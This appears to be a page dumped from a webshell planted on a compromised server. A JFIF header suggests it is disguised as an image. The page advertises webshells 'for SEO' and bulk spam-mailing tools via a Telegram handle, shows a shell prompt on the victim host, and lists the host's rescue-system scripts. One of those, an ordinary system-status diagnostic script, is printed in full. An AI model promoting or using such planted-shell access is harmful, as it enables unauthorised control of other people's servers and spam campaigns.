����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
#!/usr/bin/bash
# system-status.sh
# give s summary information about important system infos
(
LF="$(echo)"
echo "---------------------------------------------------------------"
echo "System Status Overview for $(hostname -f)"
echo "I am $(uname -a)"
echo "---- Loaded modules:"
lsmod
echo "---- NIC configuration:"
for k in $(ip l |grep \< | cut -d : -f 2) ; do
	echo "NIC $k:"
	ethtool -i $k 2>&1
	ethtool $k 2>&1
done
if test $(brctl show | wc -l) -gt 1 ; then
	echo "---- Bridge configuration:"
	brctl show
	for k in $(brctl show | grep '\.' | tr -s "\t " " " | cut -d " " -f 1) ; do
		echo "-- Bridge $k STP status:"
		brctl showstp $k
		echo "-- Bridge $k MAC addresses:"
		brctl showmacs $k
	done
fi
#sleep 1 # to let syslog send the data
echo "---- IP configuration:"
ip addr list
echo "---- IP routing:"
ip route list
echo "---- IPTABLES status:"
iptables -L -v -n
iptables -L -v -n -t nat
if type -p ebtables >/dev/null ; then
	echo "---- EBTABLES status:"
	ebtables -L -v -n
fi
if type -p arptables >/dev/null ; then
	echo "---- ARPTABLES status:"
	arptables -L -v -n
fi
sleep 1 # to let syslog send the data
echo "--------------------------------------------------------------"
echo "---- Running processes:"
ps ax -F
echo "---- Memory:"
free
echo "---- Network connections:"
netstat -atupn
if test -r /var/run/*ntpd.pid ; then
	echo "---- NTP information:"
	ntpq -c peers 127.0.0.1
fi
echo "---------------------------------------------------------------"
) | expand

Filemanager

Name Type Size Permission Actions
system-setup.d Folder 0755
boot File 1.51 KB 0755
dhcp-setup-functions.sh File 22.11 KB 0644
do-shutdown File 258 B 0755
ramdisk-rootfs File 569 B 0755
run-automatic-rear File 2.75 KB 0755
run-serial File 283 B 0755
run-sshd File 1.48 KB 0755
run-syslog File 1006 B 0755
system-setup File 13.97 KB 0755
system-setup-functions.sh File 1.27 KB 0644
system-status.sh File 1.45 KB 0755
unlock-opal-disks File 15.98 KB 0755